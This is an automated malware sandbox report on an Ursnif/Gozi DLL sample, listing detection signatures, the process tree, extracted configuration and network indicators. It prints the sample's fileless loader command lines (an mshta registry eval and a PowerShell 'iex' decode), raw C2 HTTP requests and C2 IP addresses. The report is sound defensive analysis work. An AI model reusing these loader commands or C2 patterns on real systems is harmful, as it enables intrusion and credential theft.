Loading ...

Play interactive tourEdit tour

Analysis Report 5fd885c499439tar.dll

Overview

General Information

Sample Name:5fd885c499439tar.dll
Analysis ID:330591
MD5:dde0277221cabab1df0e1cccf6a125b2
SHA1:a7d375672ae47f087185c78a444487aa656c8eb5
SHA256:0fb4779661fe23fdcd79c77fc74e721b637b496abe2eb26da28d12055af7b458
Tags:dllgoziisfbursnif

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file has a writeable .text section
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5880 cmdline: loaddll32.exe 'C:\Users\user\Desktop\5fd885c499439tar.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • regsvr32.exe (PID: 4540 cmdline: regsvr32.exe /s C:\Users\user\Desktop\5fd885c499439tar.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5548 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 4724 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 340 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 948 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 4532 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 5720 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6492 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82952 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 4696 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6716 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 5952 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17436 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 2436 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6712 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1360 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3A14.tmp' 'c:\Users\user\AppData\Local\Temp\40soah3l\CSC95BB5FC1CC074173A3B7FF0DF3A65D4.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6172 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5288 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B0B.tmp' 'c:\Users\user\AppData\Local\Temp\kpzypqek\CSCCCB2EFB1A41F4F449A32549AFB48267C.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5760 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\E443.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@424505hh", "dns": "424505", "version": "250167", "uptime": "185", "crc": "2", "id": "4343", "user": "ef15d01308f8d2d8cdc8873a31eb82f6", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 21 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6712, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', ProcessId: 1360
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2436, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 6712
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6712, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline', ProcessId: 1360
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5548, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4724

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: regsvr32.exe.4540.1.memstrMalware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@424505hh", "dns": "424505", "version": "250167", "uptime": "185", "crc": "2", "id": "4343", "user": "ef15d01308f8d2d8cdc8873a31eb82f6", "soft": "3"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 5fd885c499439tar.dllVirustotal: Detection: 18%Perma Link
            Source: 5fd885c499439tar.dllReversingLabs: Detection: 17%
            Machine Learning detection for sampleShow sources
            Source: 5fd885c499439tar.dllJoe Sandbox ML: detected
            Source: C:\Windows\explorer.exeCode function: 30_2_04E0174C RegisterDeviceNotificationA,30_2_04E0174C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04FA32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_04FA32BA
            Source: C:\Windows\explorer.exeCode function: 30_2_04DEA85C FindFirstFileW,DeleteFileW,FindNextFileW,30_2_04DEA85C
            Source: C:\Windows\explorer.exeCode function: 30_2_04DF0C34 FindFirstFileW,30_2_04DF0C34
            Source: C:\Windows\explorer.exeCode function: 30_2_04E00180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,30_2_04E00180
            Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState
            Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Packages
            Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Found Tor onion addressShow sources
            Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
            Source: Joe Sandbox ViewIP Address: 172.217.22.66 172.217.22.66
            Source: Joe Sandbox ViewJA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: Joe Sandbox ViewJA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd
            Source: unknownTCP traffic detected without corresponding DNS query: 89.44.9.160
            Source: unknownTCP traffic detected without corresponding DNS query: 89.44.9.160
            Source: unknownTCP traffic detected without corresponding DNS query: 89.44.9.160
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.54
            Source: global trafficHTTP traffic detected: GET /images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAnACS3mfT/L8UY8eM5OH2UEUf/YkINfq3G1re2fm3O_2/Bm50wSCja/z2jV3OYUZHUlZjtC6nrq/EjBj_2BKXD5RuU2KuhV/Cl0uV3h6LO61AkcuYZIVPE/IwiDB_2Fh5ocS/vj9JcGyf/6k71ht.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: loogerblog.xyzConnection: Keep-AliveCookie: PHPSESSID=jk7j02809o01qf4vm1q8i24ab4; lang=en
            Source: global trafficHTTP traffic detected: GET /images/mbvAWlXhGgjVcTCfFjQ/3O2AqJHvXl_2F3rHmST_2F/JBzJ8PgEHj9az/YhLHOgEV/FDnk_2BI6y_2FNZ1SYC0DHX/yz_2FidSfI/ISjXdHdSruWXI8x4L/I9bnuo4yasJ3/EeDt6cIikbB/1cEqD7MX_2Frsy/QkskFGS9_2BRFwpkzEev_/2FdOjUmi3y2iP97w/gNY3W1_2FvHzBhL/aaNiZHe0/y.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=jk7j02809o01qf4vm1q8i24ab4
            Source: global trafficHTTP traffic detected: GET /images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2F9/LlGO2SSA0NV0T/hSQO_2BH/cC6AH5VKEVWx8JPacUwAYFJ/hgtk8WIB3K/d_2BdLS2yTOt6Dg4V/0VLl0wtt1zqh/gtyvfsYSOv2/OI80MTVkGXkXTK/hTK1aCHhr3hGK_2B_2Bhy/9cV8P8A2W8lNQ3ZP/mR3nBi4b/B.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: loogerblog.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=jk7j02809o01qf4vm1q8i24ab4
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmpString found in binary or memory: :2020121520201216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
            Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmpString found in binary or memory: :2020121520201216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 3656 equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
